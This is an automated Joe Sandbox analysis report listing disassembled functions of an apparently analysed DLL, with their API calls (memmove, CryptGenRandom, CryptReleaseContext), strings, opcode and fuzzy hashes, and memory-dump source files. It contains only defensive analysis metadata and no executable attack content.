Opcode ID: 47d908363e80b60890a3f60237deefb6b23b86f9bd3f92a9e6581abba009f0f4
Instruction ID: 22712bd4b77a4b29097655179b8beed89b23d1f6f7a26d438eb3ade0d19cdf88
Opcode Fuzzy Hash: 47d908363e80b60890a3f60237deefb6b23b86f9bd3f92a9e6581abba009f0f4
Instruction Fuzzy Hash: CD327271A056069FEB24CFA8C490BAEB7F5FF89704F15512CE5069B754EB30E901CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B5DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d5efc21ac28d3686d1711408aa6bcb78f441b33e01f647e7e7e014f3a1ceca
Instruction ID: ea9a07f3678aa66b4dafb976db68bd2e1210e460e6d35ee7ae58df25dc4992b8
Opcode Fuzzy Hash: d1d5efc21ac28d3686d1711408aa6bcb78f441b33e01f647e7e7e014f3a1ceca
Instruction Fuzzy Hash: C702E0704183948FC744DFA9E8A063EBBF1EBCA311F41490EE6F6572A5CB74A558CB21

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B5EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6D0B62FC
_memmove.LIBCMT ref: 6D0B632B
_memmove.LIBCMT ref: 6D0B635A
_memmove.LIBCMT ref: 6D0B6389

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b24d0a2a939aff00040840afffedb8de65b1ced4755b2ed7564135ad9e6c7e6c
Instruction ID: ded27c9894dc0fcbd04f39701c43c0bd81e80acd595be0d1a871b103bfccc610
Opcode Fuzzy Hash: b24d0a2a939aff00040840afffedb8de65b1ced4755b2ed7564135ad9e6c7e6c
Instruction Fuzzy Hash: 65E1B2704183958FC744DFA9E8A063E7BF1EBCA211F41450EE2F5572A5DB78A16CCB21

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BDE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,400BD10B,00000000), ref: 6D0BDE6F
__CxxThrowException@8.LIBCMT ref: 6D0BDEB9

Part of subcall function 6D0BDD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D0DF0E6,000000FF,6D0BDF67,00000000,?), ref: 6D0BDDB4

Strings

CryptGenRandom, xrefs: 6D0BDE7B

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: efd9e670779451b85d2d41eebedc46621a51d356ac44c9f708d8fdecf3b19f76
Instruction ID: 9d6236ebcb1a120503d6f6c079e677313564ed09cdee2791d94184571f9f7be8
Opcode Fuzzy Hash: efd9e670779451b85d2d41eebedc46621a51d356ac44c9f708d8fdecf3b19f76
Instruction Fuzzy Hash: E421387150C3809FE704EF24D544B5ABBF8FB89728F004A1EF4A587290EBB5E504CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B63B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6D0B6437

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c47cb0e295915af42660f4b4eeebf692cff0d5d18eefeac93e86e225a74cc057
Instruction ID: f1196d72549b73c62aae87af4c787dcbc080a4325c38310feccc5c12e583e139
Opcode Fuzzy Hash: c47cb0e295915af42660f4b4eeebf692cff0d5d18eefeac93e86e225a74cc057
Instruction Fuzzy Hash: 3A52F1706086A58FC714CF29C4A0A36BBF2EFCA31175485AED4D68B396D734F552CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BD9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,400BD10B,75A8FC30,?,00000000), ref: 6D0BDA1A

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

Strings

OS_Rng: , xrefs: 6D0BDA35
operation failed with error , xrefs: 6D0BDA49

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: 7c3195a3559edd53e2283c24a8e5b8b2c134d851ec799a1963355b237be08460
Instruction ID: c08c26b068774c65711433a28bee0ba4f709caa7f808ce1eded24edbf0f0f506
Opcode Fuzzy Hash: 7c3195a3559edd53e2283c24a8e5b8b2c134d851ec799a1963355b237be08460
Instruction Fuzzy Hash: 1D4149B150C380AFE320CF69D841B9BFBE8BBD9758F11492DE28987291DB759404CB63

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C1CA0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6D0C1E1D

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

__CxxThrowException@8.LIBCMT ref: 6D0C1E32

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: 5e700032edd73203e6a6182c090bc936e53d63c9242e6e8bfe630590baced0af
Instruction ID: a542905005fde90b780d5e477a971709c712528cc5ada59cabdb0b5a21a32493
Opcode Fuzzy Hash: 5e700032edd73203e6a6182c090bc936e53d63c9242e6e8bfe630590baced0af
Instruction Fuzzy Hash: 4F328771E046069FEB18CFA8C890BAEB7F6BF89740B15411DE5169B754EB30E901CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D0B89 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f3d33461ce3a6f195f8b1146b12541a52f33f357508924df20ffb07b5658d5
Instruction ID: a62c97a3a0e4adfcaeb8697ae73fa06f943d73c81de055261e3a0a66f5b8b406
Opcode Fuzzy Hash: 84f3d33461ce3a6f195f8b1146b12541a52f33f357508924df20ffb07b5658d5
Instruction Fuzzy Hash: 5F320425D29F424DE7639634C832336A2A8AFF77D4F11D727F829B599AEF29C0834101

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BDEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6D064760: __CxxThrowException@8.LIBCMT ref: 6D0647F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6D0BDF7B

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: 660c4ac4005f669652b9de3cc0c17399682453246d26aaa922e1df63debad44b
Instruction ID: 373f682994de44a1a8066b7b48c7a2a55878db75f0438ff990b229166c5ffd05
Opcode Fuzzy Hash: 660c4ac4005f669652b9de3cc0c17399682453246d26aaa922e1df63debad44b
Instruction Fuzzy Hash: C621AFB550C341ABD600DF15D840B5BBBE8EB9A768F050A2DF94683381D772E508CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BDD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D0DF0E6,000000FF,6D0BDF67,00000000,?), ref: 6D0BDDB4

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 971879e820fbdf703e397813d71095bde7bb274dc3394f74025a8cedf230aab7
Instruction ID: b0ae465e703a2eb5a4102e44b4757ec50037b0b3d98006064d8f7b6d76ce4377
Opcode Fuzzy Hash: 971879e820fbdf703e397813d71095bde7bb274dc3394f74025a8cedf230aab7
Instruction Fuzzy Hash: 601184B1B0C7519BFB10DF589981766B7E8E745654F04052EE95AC3380EFBAD40487A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0E35E0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D0E35F5

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: b3138f8a36e2a0fb2230da5ae47d228aeb69e6909f2a7ecc576b5065f7ea8c45
Instruction ID: 3c002293d2d18566eab11ec31c3416012943ca81130f96fff6f476a3a5596b9f
Opcode Fuzzy Hash: b3138f8a36e2a0fb2230da5ae47d228aeb69e6909f2a7ecc576b5065f7ea8c45
Instruction Fuzzy Hash: 49D0A7B27011126BFF20DB64FE05B5A36E85B0A291F090029F504C73A0DFB4D800CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BD7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D0BD803

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 2cbc3f909f1d833d0862b718af7c2a32e3d75091c1bb45f93836ec31f4009e30
Instruction ID: 46a8b725245a72be850fd8ac115f0c927add403c63ff1cd91f4814cf62651438
Opcode Fuzzy Hash: 2cbc3f909f1d833d0862b718af7c2a32e3d75091c1bb45f93836ec31f4009e30
Instruction Fuzzy Hash: 43D02EB170821122F3209A149C04B5BB6CC8F40A46F09483CF54AD3280C7B0C84082E6

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BD7D4 Relevance: 1.5, APIs: 1, Instructions: 9encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D0BD7E0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: ac6f3164ed4c743479a880156cd4274aa9c0e9bbdde8322c55cece16dd3797e3
Instruction ID: 368b898aa916861bdd2a303291d15ea7b40cb0c7e5209b6b35c4ca3a62bd387e
Opcode Fuzzy Hash: ac6f3164ed4c743479a880156cd4274aa9c0e9bbdde8322c55cece16dd3797e3
Instruction Fuzzy Hash: 23B0927074520167EE289B12CA98B69A6299F81B05F104AACA10A550808673D8028614

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B5830 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

@, xrefs: 6D0B5A30

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 07d62df93e4ab0c31ad0bb041b531bd76de563f62c72d100a4fc58c2230fedfc
Instruction ID: 6910a9261488cf221136518d60f8854550f822b6a0ee753dd977f36267131b54
Opcode Fuzzy Hash: 07d62df93e4ab0c31ad0bb041b531bd76de563f62c72d100a4fc58c2230fedfc
Instruction Fuzzy Hash: 06915A72818B868BE701CF2CC882AAAB7E0FFD9354F149B1DFDD462641EB759544CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6D0DBFF1 Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

Strings

N@, xrefs: 6D0DC001

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: 603358d0464594306d2fea00099965579d813790677c202c9e871ce2a681fef2
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: 636159729003168FEB58CF48C4946AEBBF2BF88310F1AC5AED9195B361C7B19954CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B58D7 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

@, xrefs: 6D0B5A30

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: dc0697ee265069454bfb6baacc961230549f1379647533826f95193a832119ad
Instruction ID: c722cd45ac464da5da182512a9a709c1e200211bf77415aa539957bf703fd826
Opcode Fuzzy Hash: dc0697ee265069454bfb6baacc961230549f1379647533826f95193a832119ad
Instruction Fuzzy Hash: EF514D72818B868BE712CF2DC8826BAF7E0BFD9244F209B1DFDD462601EB759544C781

Uniqueness

Uniqueness Score: -1.00%

Function 6D0B58D5 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

@, xrefs: 6D0B5A30

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
